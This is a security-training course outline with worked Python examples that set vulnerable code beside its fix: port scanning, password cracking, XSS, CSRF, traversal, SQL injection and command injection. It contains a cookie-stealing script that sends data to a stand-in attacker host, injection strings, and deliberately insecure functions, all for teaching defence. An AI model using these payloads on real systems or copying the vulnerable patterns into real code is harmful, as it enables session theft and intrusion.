Know Thy Enemy
Duration: 3 days

Synopsis This course focuses on application security - but from the hacker's perspective. Hacker tools and techniques are explained with many practical examples. Students obtain hands-on experience not just in using the tools, but working to defend against them. Common and widely used exploits are analyzed and ways to remediate them are explained.
Target Audience System Administrators and security officers who wish to gain insight on how to better defend their systems by getting to know how hackers operate. (Developers looking for insight into secure coding techniques should consider the Secure Programming Seminar)
  • Understand the hacker "mindset"
  • Explain vulnerabilities and methods of exploitation
  • Use common hacking tools
  • Understand and demonstrate privilege escalation
  • Understand and demonstrate Code, SQL and Script injection
  • Analyze and explain forensic data
Exercises This course is a 60%/40% mix of theory and practice. Using virtual machines, we simulate real-life scenarios of attacking remote Windows and Linux servers. Guided exercises demonstrate the myriad tools and techniques employed by hackers. A theory-only course can be completed in two days; the hands-on exercises require an additional day.
1. The hacker methodology
2 hours
Before we get to the actual attacks, we lay down the foundations by describing the methodology and modus operandi. We define the terminology and nomenclature of information security, and illustrate the three stages of a successful hack:
  • Reconnaissance: Gathering information on remote targets
  • Infiltration: The attack
  • Propagation: Strengthening the foothold and infiltrating related systems
2. Network (in)security
2 hours
Starting with network layer insecurities, we discuss issues in Layers II, III and IV: Ethernet, IP, and TCP/UDP weaknesses that are inherent in the protocol design. Topics include:
  • Scanning - Using ICMP, TCP and UDP to gather data on remote targets, including fingerprinting the operating system versions
  • Sniffing - Intercepting network traffic in both wired and wireless environments. Focus on Wi-Fi environments and WEP encryption cracking
  • Spoofing - Masquerading network traffic for purposes of impersonation
  • Tunneling - Establishing covert channels over "normal" network traffic
  • Denial of Service - Malforming traffic itself for attack purposes
  • Tools:
    • Nmap
    • Nessus
    • WinFingerPrint
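As an added example for the scanning topic (this is not course material or code from the tools listed above): a TCP connect scan in Python that classifies each port by how the target answers. A completed connect() means open; an immediate connection refused (the target sent RST) means closed; a timeout with no answer at all is what a packet filter silently dropping probes looks like, reported as filtered. The target is a listener the script starts itself on the loopback interface, so nothing here will ever show as filtered; that state only appears across a real network path.

```python
"""TCP connect scan with open/closed/filtered classification.
Added example for this course page; the listener is a constructed target,
not a real service.  Assumes a loopback interface is available."""
import errno
import socket
import threading


def start_listener(host="127.0.0.1"):
    """Constructed target: bind an ephemeral TCP port and accept connections
    in a background thread.  Returns (port, shutdown_function)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)
    srv.settimeout(0.2)          # so the accept loop can notice the stop flag
    port = srv.getsockname()[1]
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
                conn.close()
            except socket.timeout:
                continue
            except OSError:
                break
        srv.close()              # fully release the port once the loop ends

    t = threading.Thread(target=serve, daemon=True)
    t.start()

    def shutdown():
        stop.set()
        t.join()

    return port, shutdown


def probe(host, port, timeout=0.5):
    """Classify one port as 'open', 'closed' or 'filtered'."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"            # three-way handshake completed
    except socket.timeout:
        return "filtered"        # no SYN/ACK and no RST: probe was dropped
    except OSError as e:
        if e.errno == errno.ECONNREFUSED:
            return "closed"      # target answered with RST
        return "filtered"        # e.g. EHOSTUNREACH: treat like a dropped probe
    finally:
        s.close()


def connect_scan(host, ports, timeout=0.5):
    """Return {port: state} for every port in `ports`."""
    return {p: probe(host, p, timeout) for p in ports}


if __name__ == "__main__":
    port, shutdown = start_listener()
    # Port 1 (tcpmux) is almost never bound, so it shows the 'closed' case.
    for p, state in sorted(connect_scan("127.0.0.1", [port, 1]).items()):
        print(f"{p}/tcp {state}")
    shutdown()
```

Nmap's connect scan (-sT) works the same way but uses the OS socket API for every port; its SYN scan (-sS) sends the raw SYN and never completes the handshake, which needs raw sockets and is why it is quieter in the target's application logs.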
3. All your secrets are ours
2 hours
A primer on encryption, explaining the ideas behind symmetric and asymmetric cryptography and hash functions.
  • Fundamentals of cryptography
  • Storing passwords
    • Traditional UNIX hashes (DES)
    • UNIX ECF passwords (MD5, AES...)
    • Windows passwords
  • Tools
    • John the Ripper
    • L0phtCrack
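As an added example for the password storage topic (not course material, and not how John the Ripper or L0phtCrack are implemented): the same constructed user list stored two ways, and a dictionary attack against each. The first scheme is a single unsalted SHA-256, which has the weakness of the older unsalted Windows LM/NT hashes: one table of hashed candidates cracks every user at once, and identical passwords are visible as identical hashes. The second scheme is a per-user random salt with PBKDF2-HMAC-SHA256, the modern descendant of the salted UNIX crypt() hashes named above: each user must be attacked separately, and the iteration count multiplies the cost of every guess. The user names, passwords, wordlist and iteration count are all made up for the example; production iteration counts are higher.

```python
"""Unsalted vs salted, iterated password storage under a dictionary attack.
Added example for this course page; all data below is constructed."""
import hashlib
import hmac
import os

# Constructed sample data: users and the (weak) passwords they chose.
USERS = {"alice": "letmein", "bob": "Password1", "carol": "letmein", "dave": "Xq9!vL#2pRz"}
WORDLIST = ["123456", "password", "letmein", "qwerty", "Password1"]
ITERATIONS = 50_000          # deliberately low so the example runs quickly


def store_unsalted(users):
    """Scheme 1: hash = sha256(password).  Same password -> same hash."""
    return {u: hashlib.sha256(p.encode()).hexdigest() for u, p in users.items()}


def store_salted(users):
    """Scheme 2: per-user 16-byte random salt, PBKDF2-HMAC-SHA256, salt stored alongside."""
    out = {}
    for u, p in users.items():
        salt = os.urandom(16)
        digest = hashlib.pbkdf2_hmac("sha256", p.encode(), salt, ITERATIONS)
        out[u] = (salt, digest)
    return out


def crack_unsalted(db, wordlist):
    """One precomputed table of hashed candidates cracks every user at once."""
    table = {hashlib.sha256(w.encode()).hexdigest(): w for w in wordlist}
    return {u: table[h] for u, h in db.items() if h in table}


def crack_salted(db, wordlist):
    """Every user needs the whole wordlist re-derived under their own salt.
    Returns (cracked, number_of_derivations) so the extra work is visible."""
    found, work = {}, 0
    for u, (salt, digest) in db.items():
        for w in wordlist:
            work += 1
            cand = hashlib.pbkdf2_hmac("sha256", w.encode(), salt, ITERATIONS)
            if hmac.compare_digest(cand, digest):
                found[u] = w
                break
    return found, work


def verify_salted(db, user, password):
    """Login check: re-derive with the stored salt, compare in constant time."""
    salt, digest = db[user]
    cand = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(cand, digest)


if __name__ == "__main__":
    u = store_unsalted(USERS)
    print("unsalted: alice and carol share a hash ->", u["alice"] == u["carol"])
    print("cracked (unsalted, 5 hashes computed):", crack_unsalted(u, WORDLIST))
    s = store_salted(USERS)
    cracked, work = crack_salted(s, WORDLIST)
    print(f"cracked (salted): {cracked} after {work} PBKDF2 derivations")
```

The dictionary recovers the same three weak passwords in both cases; what changes is the price. The unsalted attack cost five hashes for the whole database, the salted one cost sixteen derivations of 50,000 HMAC rounds each, and the strong password was never found by either.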
4. Application Security
2 hours
The basic principles of application security: how and what can go wrong in seemingly innocuous applications. Possible outcomes of vulnerabilities in user applications, including:
  • Information Leakage - Disclosure of private and/or sensitive information under incorrect circumstances
  • Denial of Service - Application/system crashes intentionally induced by a hacker attack
  • Logic Subversion - Overriding the application's decision making and triggering unintended, insecure functionality
  • Injection - Introduction of foreign files/scripts/SQL/code into an application, thereby overriding its logic and wresting control
5. Interlude: Web Applications
2 hours
Basic concepts in web applications. The World Wide Web is the most common platform for attacks. In order to understand specific vulnerabilities, we first elaborate on the ways in which web applications are similar to or different from traditional programs.
  • HTTP - The Hyper Text Transfer Protocol
  • Input in HTML forms. Important tags, GETs vs. POSTs
  • JavaScript
  • OWASP - Top 10 vulnerabilities
  • Cross Site Scripting (XSS) and JavaScript injection
  • Cross Site Request Forgery (CSRF, also written XSRF)
  • Tools
    • OWASP WebScarab
    • Acunetix vulnerability scanner
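As an added example for the XSS and CSRF items (not course material, and not taken from WebScarab or Acunetix): a toy server-side handler in Python showing both faults beside their fixes. The request and session objects are simplified stand-ins, not a real web framework, and the attacker domain in the payload is a made-up example address. Reflected XSS: render_naive() pastes a query parameter straight into the page, so a script tag in the parameter becomes live markup; render_escaped() HTML-encodes it on output so the browser shows it as text. CSRF: the browser attaches the session cookie to any request, including one an attacker's page provokes, so a state-changing POST must also carry a per-session random token that the attacker's page cannot read.

```python
"""Reflected XSS and CSRF on a toy handler, vulnerable beside fixed.
Added example for this course page; the session store and form dicts are
constructed stand-ins for a framework's request/session objects."""
import hmac
import html
import secrets

# Constructed payload: steals the cookie to a made-up attacker host.
SCRIPT = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"


def render_naive(name):
    """Vulnerable: the parameter is inserted as markup."""
    return f"<p>Hello {name}</p>"


def render_escaped(name):
    """Fixed: HTML-encode on output; '<' becomes '&lt;' and cannot open a tag."""
    return f"<p>Hello {html.escape(name, quote=True)}</p>"


def contains_script_tag(markup):
    """Crude check used to show whether the payload survived as a tag."""
    return "<script" in markup.lower()


# --- CSRF ------------------------------------------------------------------
SESSIONS = {}    # session_id -> csrf token (server-side state, constructed)


def new_session():
    """Issue a session id and a separate random CSRF token for it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = secrets.token_urlsafe(32)
    return sid


def transfer_form(sid):
    """The legitimate form embeds the session's token as a hidden field."""
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf" value="{SESSIONS[sid]}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')


def handle_transfer(sid, form):
    """State-changing request: the cookie (sid) alone is not enough,
    the submitted token must match the one issued to this session."""
    expected = SESSIONS.get(sid)
    supplied = form.get("csrf", "")
    if expected is None or not hmac.compare_digest(supplied, expected):
        return 403, "CSRF token missing or wrong"
    return 200, f"sent {form['amount']} to {form['to']}"


if __name__ == "__main__":
    print(render_naive(SCRIPT))          # script tag reaches the browser intact
    print(render_escaped(SCRIPT))        # rendered as harmless text
    sid = new_session()
    # An attacker's page can make the victim's browser send the cookie, but
    # it cannot read the token out of the victim's form, so this is refused.
    print(handle_transfer(sid, {"to": "attacker", "amount": "1000"}))
    # The genuine form submission carries the token and succeeds.
    print(handle_transfer(sid, {"to": "alice", "amount": "10", "csrf": SESSIONS[sid]}))
```

Note that the XSS fix is output encoding at the point of insertion, not input filtering; the same value may need URL, JavaScript or attribute encoding elsewhere on the page, which is why a blocklist of "bad" characters on input is the wrong layer for this defence.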
6. Application Security faults
4 hours
Common faults in applications, including:
  • Directory Traversals - Breaking out of the application's intended directory
  • Escaping attacks - Providing malformed input that intentionally bypasses security checks
  • Poison Null Bytes
  • Command Injection - Supplying foreign operating system commands
  • SQL Injection - Breaking into databases by supplying input crafted to alter the logic of the application's database queries
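As an added example covering the traversal, poison null byte, command injection and SQL injection items above (not course material): each fault as the vulnerable call beside its fixed form, run against data the script constructs itself. The web root, its files, the SQLite table and the user records are all made up for the example. The traversal fix resolves the path and requires the result to stay under the web root; the null byte check documents the classic bug where a C-based runtime truncated "secret.txt\0.jpg" after a Python or PHP extension check had passed it (current Python rejects NUL in paths on its own). The SQL fix uses bound parameters; the command fix passes an argv list so no shell ever parses the input.

```python
"""Directory traversal, poison null byte, SQL injection and command
injection: vulnerable call beside its fix.  Added example for this course
page; the web root, files and database rows are constructed."""
import os
import sqlite3
import subprocess
import tempfile

# --- constructed web root: one public file, one secret one level above it
ROOT = tempfile.mkdtemp()
PUBLIC = os.path.join(ROOT, "public")
os.makedirs(PUBLIC)
with open(os.path.join(PUBLIC, "index.html"), "w") as f:
    f.write("welcome\n")
with open(os.path.join(ROOT, "secret.txt"), "w") as f:
    f.write("db_password=hunter2\n")


def read_file_vulnerable(name):
    """Vulnerable: a naive join lets '../' walk out of PUBLIC."""
    with open(os.path.join(PUBLIC, name)) as f:
        return f.read()


def read_file_safe(name):
    """Fixed: reject NUL, resolve symlinks and '..', then require the result
    to still lie under the web root before opening it."""
    if "\x00" in name:
        raise ValueError("poison null byte")
    root = os.path.realpath(PUBLIC)
    full = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([full, root]) != root:
        raise PermissionError("path escapes web root")
    with open(full) as f:
        return f.read()


# --- SQL injection against an in-memory table ------------------------------
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE users (name TEXT, password TEXT)")
DB.execute("INSERT INTO users VALUES ('admin', 's3cret'), ('guest', 'guest')")


def login_vulnerable(user, pw):
    """Vulnerable: string formatting lets a quote in pw rewrite the WHERE clause."""
    q = f"SELECT name FROM users WHERE name = '{user}' AND password = '{pw}'"
    return [r[0] for r in DB.execute(q)]


def login_safe(user, pw):
    """Fixed: bound parameters are data and are never parsed as SQL."""
    q = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [r[0] for r in DB.execute(q, (user, pw))]


# --- command injection ------------------------------------------------------
def ping_vulnerable(host):
    """Vulnerable: shell=True means ';', '|' and '$(...)' in host are interpreted."""
    cmd = f"echo pinging {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def ping_safe(host):
    """Fixed: argv list, no shell; host is a single argument whatever it contains."""
    return subprocess.run(["echo", "pinging", host], capture_output=True, text=True).stdout


def attempt(fn, *args):
    """Return fn's result, or the exception class name if it raised."""
    try:
        return fn(*args)
    except Exception as e:
        return type(e).__name__


if __name__ == "__main__":
    print(read_file_vulnerable("../secret.txt"))              # leaks the secret
    print(attempt(read_file_safe, "../secret.txt"))          # PermissionError
    print(attempt(read_file_safe, "index.html\x00.jpg"))     # ValueError
    print(login_vulnerable("admin", "' OR '1'='1"))           # every row comes back
    print(login_safe("admin", "' OR '1'='1"))                 # []
    print(ping_vulnerable("x; echo INJECTED"))                # second command ran
    print(ping_safe("x; echo INJECTED"))                      # printed literally
```

The injected SQL works because the database parses `'' OR '1'='1'` as part of the query, and AND binds tighter than OR, so the condition becomes true for every row. The same shape recurs in each item on this list: data crossing into a parser that cannot tell it from the program's own syntax.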
7. Code Injection Attacks
4 hours
Techniques for injecting code into legacy (C/C++) applications:
  • Buffer Overflows
  • Format String Attacks
  • Integer Overflows
  • Return Oriented Programming Attacks
  • Tools
    • Metasploit
    • ROPgadget